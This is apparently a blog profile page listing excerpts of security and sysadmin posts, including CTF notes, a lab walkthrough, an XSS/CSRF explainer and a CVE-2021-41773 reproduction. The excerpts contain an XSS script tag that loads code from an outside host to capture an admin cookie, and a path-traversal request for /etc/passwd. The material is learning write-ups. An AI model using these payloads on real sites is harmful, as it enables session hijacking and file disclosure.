- 博客(9)
- 资源 (1)
- 收藏
- 关注
原创 Centos 7中部署Kubernetes
3.关闭防火墙及SELinux、清空IP tables及禁用Swap交换分区在3台虚拟机都分别操作。将k8s配置复制到2台node,并开启路由转发。2.Master机器产生报错,后续采用脚本安装。二、配置SSH免密登录、主机名解析及yum源。3.安装成功后,使用下面命令将节点加入集群。一、准备工作:部署Docker及配置。1.配置yum源安装docker。配置域名解析,分别保存到三台主机。2.配置docker的镜像加速。1.安装部署k8s相关工具。配置k8s的yum阿里源。
2023-10-06 08:35:31
164
1
原创 Centos7搭建LNMP
在html目录写入一个phpinfo(),info.php 后续改名为index.php并添加到配置文件中。未设置主页时,在地址中访问info.php,则浏览器无法解析而造成文件下载。安装编译环境(yum源是aliyun的,可自行百度更换,此处不赘述)nginx本身无法对php进行解析,安装php-fpm。将BOOTPROTO改为dhcp即可,然后重启网卡。给nginx启动进程一个身份,创建nginx用户。修改nginx配置文件,添加主页。查看帮助 ./nginx。配置完成后进行编译安装。
2023-09-24 15:10:47
141
1
原创 CTF_平台练习
把index.php用base64编码两次、hex编码一次,输入到url参数中,即可查看本题源码,进行分析。因为在源码中可以看到过滤了flag所以需要使用f*来查看。目录穿越去访问根目录下的flag。同时传递参数的位置是通过get方式传递pop的参数值。此处交由chatgpt进行分析,以下是他的回答。发现应该不是当前目录下的flag.php文件。很简单,直接上蚁剑,在根目录下查看flag。滑到页面底部找到flag。尝试sqlmap跑一手。linux系统,尝试。根据用户名提示登录网页。读取flag.php。
2023-09-17 14:32:19
623
1
原创 python计算MD5值
在CMD打开python输入>>> import hashlib计算“123456”的值>>> hashlib.md5("123456")赋值给s>>> s = hashlib.md5("123456".encode())最后输出16进制数>>> s.hexdigest()'e10adc3949ba59abbe56e057f20f883e'...
2021-10-24 14:13:54
326
原创 Hack Me Please靶机攻略
hack me please靶机攻略首先进行主机发现信息收集扫描开放的端口nmap -p- -sS -O -sV -sC -A -T4 192.168.237.197 -oN nmap.A访问80端口,首页无可用信息F12查看源码,找到main.js文件main.js是整个项目的入口文件,尝试访问main.js,查看源码发现是一个seeddms的管理系统,查看seeddms对应5.1.22版本的源码seeddms / Code / ...
2021-10-20 19:02:47
727
原创 XSS与CSRF原理解析
一、固定会话攻击1.XSS平台练习创建一个项目复制代码内容<sCRiPt sRC=//xsshs.cn/Ljwy></sCrIpT>在CMS的留言板中插入JS代码,点击提交。管理员登录网站后台查看项目获取的cookiecookie:username=admin; userid=1; PHPSESSID=5m3m8uapqrgvhi678mf5uhmgh0执行代码成功登录后台2.XSS原理图描述1)
2021-10-19 20:57:08
89
原创 CVE-2021-41773目录遍历(文件穿越)漏洞复现
CVE-202141773目录遍历(文件穿越)漏洞Linux环境下进入CVE-202141773漏洞环境文件夹,执行docker-compose up -d启动漏洞环境。等待文件下载……安装完成后重启服务访问本地的8080端口打开Burpsuite,构造get参数GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1转换为post参数修改命令为POST /cgi-bin/.%2e/%2e
2021-10-11 22:09:07
2084
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人